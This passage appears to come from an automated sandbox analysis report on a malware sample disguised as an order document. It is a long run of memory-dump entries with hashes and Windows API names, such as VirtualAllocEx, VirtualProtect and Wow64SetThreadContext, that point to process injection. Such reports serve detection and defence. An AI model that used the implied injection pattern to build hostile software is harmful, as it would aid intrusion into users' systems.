                                          • Instruction ID: 568042ef4e624bcd40a02e98932da4ec81ec52bf9eb938739d1eeb127352c2f3
                                          • Opcode Fuzzy Hash: 40d3fd8e17dae8b06733902b8dde6dd90045c48ba1d8c2805c4778c14f7251a7
                                          • Instruction Fuzzy Hash: E321F2B59003189FDB10CFA9D984AEEBBF4FB48320F14801AE918A3251D378A954CFA0
                                          APIs
                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EE2ECE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ContextThreadWow64
                                          • String ID:
                                          • API String ID: 983334009-0
                                          • Opcode ID: 3e33bc2dca0214ba6cbc87e71d9470b4a6ac96ddf9d6f40b18701ff5c872e7bb
                                          • Instruction ID: a023278b9742a327f0bba27a30fc3138fb553807f6b2a9d363ef234013afcbf0
                                          • Opcode Fuzzy Hash: 3e33bc2dca0214ba6cbc87e71d9470b4a6ac96ddf9d6f40b18701ff5c872e7bb
                                          • Instruction Fuzzy Hash: 2A2137B19003098FDB10DFAAC4857AEBBF4EB88324F14842AD519A7240DB789A45CBA4
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0192D117
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: fb54258a5ebe1eaf0b32af81295b7731464d1756eaca5d65078e118ff8df3ac0
                                          • Instruction ID: a10ca9101b8a8f45647517e113b52ad9f7b668dd2d8a7f284fdd1da0eca4fae2
                                          • Opcode Fuzzy Hash: fb54258a5ebe1eaf0b32af81295b7731464d1756eaca5d65078e118ff8df3ac0
                                          • Instruction Fuzzy Hash: 5821E3B59003589FDB10CF9AD984ADEFFF8FB48320F14801AE918A3251D378A954CFA0
                                          APIs
                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06EE37D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 991e282e7c5b127d718c6ab42ca22838d4c46fe8128058552863209a1d66e2cb
                                          • Instruction ID: 40a5276e23af80b4de6bc308673104cfefaa4037d29d3a7fe001dc485027681c
                                          • Opcode Fuzzy Hash: 991e282e7c5b127d718c6ab42ca22838d4c46fe8128058552863209a1d66e2cb
                                          • Instruction Fuzzy Hash: 862104B19003098FDB10DFAAC845AAFFBF5EF88320F50842AD459A7240DB7899458BA1
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06EE32DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0192931D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F5D694
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736118241.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f50000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06EE32DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735915925.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6ee0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 0192931D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0192AA06
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715886937.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1920000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          Similarity
                                          • API ID:
                                          • String ID: p`^q
                                          • API String ID: 0-26641872
                                          • Opcode ID: e11c289c7418f2eec5e3402d7d3be03ab866f8fb4ab05ed8d5d9b9eaa8479a8d
                                          • Instruction ID: d4c9ecbbcf0a7486756df1d24aa0d3e1e77a3908d33573ea850cec0f2821fcd5
                                          • Opcode Fuzzy Hash: e11c289c7418f2eec5e3402d7d3be03ab866f8fb4ab05ed8d5d9b9eaa8479a8d
                                          • Instruction Fuzzy Hash: 8021B335E0421ACFCB50DBA8D8809AEFBB4EF45361B14456AE551AB211D730E945C7A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: "
                                          • API String ID: 0-123907689
                                          • Opcode ID: 2e816321756d64f3c5601b607135b89e4877d74456203b297fcb0fdbd254198c
                                          • Instruction ID: 15a85a01ef6fcb5f982cc2dbaa2ae49ba685697a28183a7bf2ed2ccf44be37ac
                                          • Opcode Fuzzy Hash: 2e816321756d64f3c5601b607135b89e4877d74456203b297fcb0fdbd254198c
                                          • Instruction Fuzzy Hash: A6211A78D11228DFDBA4DF68D844B99BBB0FF0A300F1081D5D999A7251C7748A85CF61
                                          APIs
                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 06F5E703
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736118241.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f50000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4770a76023d21fe1a36ade5f2905928060cbdb852faa955e3521746a01876cac
                                          • Instruction ID: 18bdda9cfea3b680e2a85c41e1bf4720e22e13d6f78225ebbbf6b07bae6e1c2f
                                          • Opcode Fuzzy Hash: 4770a76023d21fe1a36ade5f2905928060cbdb852faa955e3521746a01876cac
                                          • Instruction Fuzzy Hash: 9C611A34B106149FDB44DF68C894AADB7B6FF89710F1441A9E906DB3A1DB30ED42CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7cf96884814c19a59e15d6932ed503d3a97a2b4a1165c78ed75b6ee7e6e984ea
                                          • Instruction ID: a2e7bc9e72ed09f0e3553b75464fa905eaa320d2a3e91c198cf1826f4985c3ed
                                          • Opcode Fuzzy Hash: 7cf96884814c19a59e15d6932ed503d3a97a2b4a1165c78ed75b6ee7e6e984ea
                                          • Instruction Fuzzy Hash: 586106B4E10619CFCB05DFA8E898AEDBBB6FF89301F148029E506AB390D7345A45CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17154bbbb3dcc94be52c40c13310a97f913cc8abce8d536b6842e75e77340b44
                                          • Instruction ID: b655b5ce666c58501c5fec15371da9ff10c162addd5166725ccc447132369d3b
                                          • Opcode Fuzzy Hash: 17154bbbb3dcc94be52c40c13310a97f913cc8abce8d536b6842e75e77340b44
                                          • Instruction Fuzzy Hash: 20517E34B006199FCB04EF64E498AAEBBB7FF89704F048119E9029B364DF349946CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71ce5a49dce74d55fad7ecbbd4db507b3601986c1cafb7fc343692e3fdeb94d0
                                          • Instruction ID: 5d57f2cdd0c628a26bfd7b2cf8224e2011e2fbd92a96083d50fa3d6d1067746f
                                          • Opcode Fuzzy Hash: 71ce5a49dce74d55fad7ecbbd4db507b3601986c1cafb7fc343692e3fdeb94d0
                                          • Instruction Fuzzy Hash: 2B51AE74E00259CFDB44DFA8D4949ACBBF2FF4A700F2058AAE506AB360D731A940DF60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8f8d8856f5597af61cf87a4aca4cf90fc868c6e8f8b7d7f78968ae530217c6e2
                                          • Instruction ID: 3f1cf45ca5e53bf01672c33a686626b3ac339b6202525e8f4ad502bf2fbc46f5
                                          • Opcode Fuzzy Hash: 8f8d8856f5597af61cf87a4aca4cf90fc868c6e8f8b7d7f78968ae530217c6e2
                                          • Instruction Fuzzy Hash: 2B51AD74E04249DFCB44DFA8D4949ACBBF2FF4A700F2058AAE546AB360D731A944DB60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 980ede54fa80dcea694ee16cf23c648db9e8c774d81b9b357e07c8720b826118
                                          • Instruction ID: 73bbcac67c7bc5f08b136001c737a9285f3c7a777c22682d321d87408c9eb4f3
                                          • Opcode Fuzzy Hash: 980ede54fa80dcea694ee16cf23c648db9e8c774d81b9b357e07c8720b826118
                                          • Instruction Fuzzy Hash: 91419031F047148FCBA5DBA8D94025EBBF1EF84710B44896ED55AD7A40EA34E945CB82
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5d68fc01acb740a575f374c47e8388b378b23e1cf983a6375c885d2ea909da36
                                          • Instruction ID: ddfde2f7a8fa86ec356f4ff12b2bb3011e3e7e2f8f033291cc3c7d103e85016d
                                          • Opcode Fuzzy Hash: 5d68fc01acb740a575f374c47e8388b378b23e1cf983a6375c885d2ea909da36
                                          • Instruction Fuzzy Hash: 1051E474D01208DFDB64DFB9D584AADBBB2BF49304F20816AE809AB351DB349945CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ea088ac46b2b9dc41ab446d812f1c785a3080d5ad7c0b695b3aadfb31eb9b02
                                          • Instruction ID: 2cf12140e18fea27dc04ec63fbfd863699a520c2862302aa3fcdd6f9e50662cd
                                          • Opcode Fuzzy Hash: 8ea088ac46b2b9dc41ab446d812f1c785a3080d5ad7c0b695b3aadfb31eb9b02
                                          • Instruction Fuzzy Hash: 93412530F00704AFCB65DF69D804B9EBBB6EF86711F108169E546DB380DB31A905CB92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735567654.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d90000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 15cd41ffc8d0daa3e53bf3c4dc49f78fe1d0788dffee35ccc43ba343a8e84ffc
                                          • Instruction ID: 9c6a3cdf2c2890d1b2b5593bea0c1b0ea44a2a47d1bcdc600c0c2c2479e3ac16
                                          • Opcode Fuzzy Hash: 15cd41ffc8d0daa3e53bf3c4dc49f78fe1d0788dffee35ccc43ba343a8e84ffc
                                          • Instruction Fuzzy Hash: D751E774E01208DFDB68DFB9D544A9DBBB2FF89304F20812AE819AB350DB319941CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 213ef69d4b9aab6d98f83ad5696b74e1656e006a3f6bbe8a5f8c56a3764c07dc
                                          • Instruction ID: bc24c16404354ccd219bcd6a9884d1c8f97ffcb5a56f0c1b5b3832594d994585
                                          • Opcode Fuzzy Hash: 213ef69d4b9aab6d98f83ad5696b74e1656e006a3f6bbe8a5f8c56a3764c07dc
                                          • Instruction Fuzzy Hash: A3419D34B04209DFCB50DF68D8586ADBBB2FF89345F1048A9E8069B361CB759E85CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fbc8b0a0b33571474165d87512b800b00bc4c1718f08b98176d8aba5dc63ed1a
                                          • Instruction ID: 0256d12d2187c8ce0d765a91b02bb5f0f65ba1b86d99448dfa6739236f56370f
                                          • Opcode Fuzzy Hash: fbc8b0a0b33571474165d87512b800b00bc4c1718f08b98176d8aba5dc63ed1a
                                          • Instruction Fuzzy Hash: 3B417F71A007449FCB61CF6AD944A6ABBF2FF88300F14895DD58697A50EB31F904CFA2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4529d091add8e096336337b9c08bfb661e282779be96e5a7162fc20510b9e745
                                          • Instruction ID: 4abbffec20ea029bd1c5003802b3c147020cb0c764a33991c34429127eb40d27
                                          • Opcode Fuzzy Hash: 4529d091add8e096336337b9c08bfb661e282779be96e5a7162fc20510b9e745
                                          • Instruction Fuzzy Hash: AE519074E05228CFEBA8CF58CC94BA9B7B1BB88301F4485AAD509A7351EB745E84CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2aa456c896869af910a8b731679e343ce4cc5b90e88153e12651bf4a5c081fef
                                          • Instruction ID: 99bd0112a1c780b410ade57ce87c17d9357b305e4dcd2e0737616c4ae246e624
                                          • Opcode Fuzzy Hash: 2aa456c896869af910a8b731679e343ce4cc5b90e88153e12651bf4a5c081fef
                                          • Instruction Fuzzy Hash: 975193B4E01228CFEBA8CF98CC94BEDB7B1AB88301F4485A9D509E7351DA745E84CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72e293f2c30ac79759e3e799d30cc7a3d3b9919771f2f12061af9943b367d3f0
                                          • Instruction ID: f42f082c0d568bec71feea256c68e7691df1765ff4128561037c4a5219f105ee
                                          • Opcode Fuzzy Hash: 72e293f2c30ac79759e3e799d30cc7a3d3b9919771f2f12061af9943b367d3f0
                                          • Instruction Fuzzy Hash: 7B519371E01228CFEB68CF98CC94BEDB7B1AB88301F4485AAD509E7351DA705E84CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9cb08dad0948149f428909377515a9da40d08bd1e9632c783c4dd247dcf30577
                                          • Instruction ID: fe05ac6234b18ed7375a87f4589a2ee303d86aa3502484eac3f944e15f811694
                                          • Opcode Fuzzy Hash: 9cb08dad0948149f428909377515a9da40d08bd1e9632c783c4dd247dcf30577
                                          • Instruction Fuzzy Hash: 0E419574E05228CFEBA8CF98CC94BEDB7B1AB88301F4481AAD509A7351DB745E84CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 24f0b75627d5fafacbe55bcfb5c635c32ded9d62e1d5ddc9b283b7259f96fe06
                                          • Instruction ID: af827a87e1b550d05e39f7e23f526fd56d50e5245daac8eebd648e7ce3c4d742
                                          • Opcode Fuzzy Hash: 24f0b75627d5fafacbe55bcfb5c635c32ded9d62e1d5ddc9b283b7259f96fe06
                                          • Instruction Fuzzy Hash: F0419571E05229CFEB68CF98CC94BADB7B5AB88301F4485AAD50DA7351DB305E84CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b63cffbe52421a31398ba1937ff8954af2c7561210122125b9b3e023ccea40a
                                          • Instruction ID: 3b47a4e7ba7778c33761234f46053ee328f895407afc98e225de04d7b55cf2e6
                                          • Opcode Fuzzy Hash: 0b63cffbe52421a31398ba1937ff8954af2c7561210122125b9b3e023ccea40a
                                          • Instruction Fuzzy Hash: 7F419170E05228CFEB68CF58CC94BEDB7B1AB88305F4481AAD509AB391DB745E84CF51
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b7ca1f2757006e3da333b2b0cbd3496246a8500bc48b2fe3ae692adeafec50f
                                          • Instruction ID: ad1f51e2b70322e6d760e3b648477a4c37329bc6c38f9bf1fd897506cf774a2e
                                          • Opcode Fuzzy Hash: 7b7ca1f2757006e3da333b2b0cbd3496246a8500bc48b2fe3ae692adeafec50f
                                          • Instruction Fuzzy Hash: 6631E431F047504FCBA69BB8985025FBBF6AFC5310B05896ED44ADB640EA31ED05C793
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3310b55fe73e6a9d91e0345f6a464d56b645e4bf126c80446607d16d45facc9
                                          • Instruction ID: 3a05a6850153fa0dec439c5eb1f05854a0c0b59b82928c9508b131e1611af64b
                                          • Opcode Fuzzy Hash: b3310b55fe73e6a9d91e0345f6a464d56b645e4bf126c80446607d16d45facc9
                                          • Instruction Fuzzy Hash: 32414670D05608DFCB54DFA9D8445ADFBB5FF89300F10862AE819A7240EB30AA86CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6ae6de591453a27fb975bbe652f9d6d8e00cd62a77568b630dff38454089188c
                                          • Instruction ID: 16203d1fa76da9c388f9347ec953b3f3637d961ab31f01f9680d68655d88b944
                                          • Opcode Fuzzy Hash: 6ae6de591453a27fb975bbe652f9d6d8e00cd62a77568b630dff38454089188c
                                          • Instruction Fuzzy Hash: A2316E35E00218ABDF54EFA5D854AEEB7B6FF88310F108025E901B7290DB759E05CFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736476977.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_71d0000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 287259d6e684c87fd6d41daa1e44f95adcb1f8c6dddc62d33df5775a951e346f
                                          • Instruction ID: 5b89b0beab3d820109934867c1dc99dc80ceb56f18d6a852619c128e9a43a67b
                                          • Opcode Fuzzy Hash: 287259d6e684c87fd6d41daa1e44f95adcb1f8c6dddc62d33df5775a951e346f
                                          • Instruction Fuzzy Hash: 5531F776600505DFCB45CF98D888E99BBB6FF49320B1680A8E9099B3B2D731ED55DB40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9288e746caf7f5208ceccddd8068f1ad662818f1879754888c42a9b19e2dee2
                                          • Instruction ID: adec4527d8612f1ec5d7fe7fabccd314cdee38ef454f7bcbce6b52f514b33aac
                                          • Opcode Fuzzy Hash: a9288e746caf7f5208ceccddd8068f1ad662818f1879754888c42a9b19e2dee2
                                          • Instruction Fuzzy Hash: 20411574D0560DDFDB54DFA9D8445ADFBB5FF89300F10862AE919B3200EB30AA86CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1736016782.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea3d64c25301ac814f2f8254d511abda922cfb7fe5865f96ef8ad20d7b394688
                                          • Instruction ID: 826ace61d480439ce1cc3a44fe845112bd7ba2243fc1da3d1830cf6018a936a8
                                          • Opcode Fuzzy Hash: ea3d64c25301ac814f2f8254d511abda922cfb7fe5865f96ef8ad20d7b394688
                                          • Instruction Fuzzy Hash: C041BC31E0021ACFDB50CFA5C944ABEBBB5FF88384F00846AD905EB2A0E734D945CB90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f8311678428499e37cfbf0432894fc9c149316fc0d5da3a0c8fd21887495830
                                          • Instruction ID: 27c397c115a52e800a28e82abb8682d2becad5269221b046629c6a3f54d94a85
                                          • Opcode Fuzzy Hash: 5f8311678428499e37cfbf0432894fc9c149316fc0d5da3a0c8fd21887495830
                                          • Instruction Fuzzy Hash: A3313675E05209DFDB84CFAAD4846EEBBF2FF89300F14806AD515AB244E7345A46CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1735482960.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6d70000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • Opcode Fuzzy Hash: 0195097c22c5a3780cc1b0e4e0351c1329ddf9731d2b49106e0169b8fda0bdac
                                          • Instruction Fuzzy Hash: 2A110471D05348EFC790DFB8C8156BD7FF4DB09205F2085EAD848DB251EA328A01CB92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715110879.000000000183D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0183D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_183d000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                          • Instruction ID: b94cc69fafcee03c51ef3b32ad2f803a0ea05dc78b980654d7e809962708351a
                                          • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                          • Instruction Fuzzy Hash: F7110676904240CFDB02CF44D5C4B16BF72FB84324F28C2A9E9054B257C336D55ACB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1715167806.000000000184D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0184D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_184d000_GEFA-Order 232343-68983689.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5cca3b6083d3cd9d5895b52ac11f54ed2289ca6e68c0d87637972eb0d922851
